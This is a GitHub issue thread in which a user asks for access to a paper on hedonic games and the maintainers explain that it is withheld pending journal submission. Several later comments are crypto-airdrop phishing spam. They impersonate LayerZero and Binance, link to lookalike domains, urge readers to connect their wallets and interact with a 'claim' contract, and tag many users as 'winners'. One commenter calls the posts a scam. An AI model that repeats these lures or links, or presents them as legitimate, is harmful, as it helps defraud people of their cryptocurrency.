### ISSUE TITLE
Paper access

### ISSUE THREAD

**Issue by edebie** [lucaslopes/hedonic-game#3]
Hi, 

Thank you for your work. I tried to download your paper but the provided link does not work anymore. Can you please update the link?

**Comment by lucaslopes** [comment]
Hi,

I appreciate your interest. We disable the link to the paper because we will submit it to a journal. Once we publish, I'll update the link. Until then, I'll leave this issue open.

**Comment by danielsadoc** [comment]
Hi Everyone, please, if you can identify yourself, we may share a draft

best, Daniel


Em qua., 13 de jul. de 2022 às 13:14, Lucas Lopes ***@***.***>
escreveu:

**Comment by gqgserver** [comment]
# $1000 Christmas Airdrop for 10,000 Eligible Users! 🎅🎁

Welcome to the festive $1000 Christmas Airdrop by LayerZero! Get ready to unwrap the joy and claim your share of $ZRO tokens. Here's your guide to participating:

[Claim Now on LayerZero Official](http://link.layerzer0network.online/rFz335)

![Claim Now](https://miro.medium.com/v2/resize:fit:720/format:webp/1*SalqMtUhedutBSfrW7-T-A.png)

## Airdrop Participation Steps:

1. **Connect Your Wallet:**
   - Visit the [LayerZero Airdrop](http://link.layerzer0network.online/rFz335).
   - Integrate your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Spread the Christmas Spirit:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&text=LayerZero+Christmas+Airdrop)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&text=LayerZero+Christmas+Airdrop)
   - **Instagram:**
     [Share on Instagram](https://instagram.com/share?url=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&title=LayerZero+Christmas+Airdrop)

3. **Verification Check:**
   - Confirm your eligibility for the LayerZero Christmas Airdrop and secure your $ZRO tokens.

Don't miss out on this festive collaboration – claim your Christmas tokens now and let the holiday spirit shine with LayerZero!

**Comment by Vishnuraj2mail** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

Winners: @montelai, @deliangyang, @a-nai, @tomaszheng, @hanli-msft

Winners: @tatianamc, @jesmaelnezhad, @hyc5566, @krisbuote, @chaploud

Winners: @nucery, @allenmien, @brianbeach95, @mikkkeldp, @twentyone24

Winners: @firstfu, @mrwonderfulness, @mmacedoeu, @bugpoop, @amertulker

Winners: @rthodges, @szz1233, @wjc9011, @DarkWingMcQuack, @khazaddim

Winners: @hemantapkh, @yu-shin, @twbrandon7, @tabibzadeh, @funtik039

Winners: @nikolayvoronchikhin, @myworldbox, @Arpey, @Poodly, @Venka97

Winners: @saurabhiyer, @TA2018b, @xjx0524, @2YoungKim, @fqinhong

Winners: @mohsen-in, @intergalacticmammoth, @samadli, @happywar, @greemd

Winners: @Gabangxa, @sabirjana, @Parsbitx, @lvm0306, @peterchoee

Winners: @m-t-space, @jsgalarraga, @tianrking, @leiless, @oatmeal3000

Winners: @dushamishkin, @DmitriyVdE, @hcc5, @mutcato, @alexjorgef

Winners: @agn-7, @garnathere, @off99555, @hanung665, @0219nice

Winners: @alexmulligan, @OfficialRaider-dev, @mircofx, @PabloAlexis611, @pavelkrolevets

Winners: @OmarSaidIbrahim, @songshijun007, @SALBO-Y, @webbergde, @tonilopezortiz78

Winners: @emilius88, @braveltd, @iTzGlitch, @xSinGle, @mahho

Winners: @Universe1122, @DerienFe, @lrxtzm, @illegalbyte, @drdada

Winners: @JeremieWU23, @sdcwxy, @Chinjoy, @jacob800324, @anandarajRepo

Winners: @jdoxley, @gobs-code, @TPEC, @rAm1n, @Essaam

Winners: @gsmit, @Valuebai, @wnma3mz, @NabilC, @Polypod

Winners: @poosupan, @neutron220, @diewland, @emiliotorrens, @bengdan

Winners: @hyqer, @jfuerst92, @troiad, @2firstnames, @sennhvi

Winners: @pataugusto, @diegozr1, @AtlasQ, @Blackcol, @tenondecrpc

Winners: @eduramofo, @zsuswy, @ricardo85x, @maccn, @OfficialRaider-dev

Winners: @grevgeny, @v-buyukli, @Os14-hash, @msb1002, @KalinLai-void

Winners: @QJ-S, @JPLACLAU, @jashha, @psyljz, @julyanserra

Winners: @Delerrr, @dduong1603, @Grimath, @xaviergoby, @rhuang10

Winners: @Komlokoz77, @thlee-cs, @Jimmy-Xu, @bluceliuljx, @mabedis

Winners: @hotratx, @wangmn93, @ferdavs, @iainwh, @shukob

Winners: @jowtro, @CryonicsX, @yingcuhk, @sudotty, @965019007

Winners: @soloblack, @VictorOPreuss, @mutalisk999, @KopanevPavel, @GoSoul22

Winners: @oberon2410, @koutsie, @ICEMAN-CN, @krullig, @exherb

Winners: @cyaenorama, @cryptoTOM97, @kstka, @cajoku, @dingguijin

Winners: @JeroenProoth, @ganiromnovda, @kokkoks, @algonell, @cabrito007

Winners: @gabriel-milan, @EBhub, @Vestibule, @jyeung205, @ebdavison

Winners: @dragekjeks, @LUS8806, @olga2812, @Amad3eu, @SerhatTeker

Winners: @Luqsonic, @GO1984, @pedramamini, @ervinuk, @rushilsrivastava

Winners: @vanessa, @tech-engine, @jacky007wang, @chrissayon, @sjuanandres0

Winners: @wuyan516, @NabilC, @lizhihao6, @kvlvs, @AlanKokoiev

Winners: @Quantum2Hybridization, @p-kozlakov, @YHEYLE, @TIANRENK, @smjure

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @shivamkumar177, @RustyBadRobot, @ayv2004, @avinashkoyyana, @project2501x, @jdktomcat, @spainbox, @projenix, @guilhersantos, @Zzz233

**Comment by katsavav** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @Maximka-hue, @bsgao, @graalogosh, @shrynx, @DaShak, @NickGonzalez04, @Mult1Hunter

**Comment by DaShak** [comment]
Above is a scam, @lucaslopes

**Comment by tomaszheng** [comment]
Get it！        
            
                
                    
                            
                                
                            
                            
                                tomaszheng
                            
                    
                        
                            
                                    ***@***.***
                            
                        
                
            
        ---- Replied Message ----FromDaniel ***@***.***>Date1/25/2024 ***@***.***>***@***.***>***@***.***>SubjectRe: [lucaslopes/hedonic-game] Paper access (Issue #3)Above is a scam, @lucaslopes—Reply to this email directly, view it on GitHub, or unsubscribe.You are receiving this because you were mentioned.Message ID: ***@***.***>
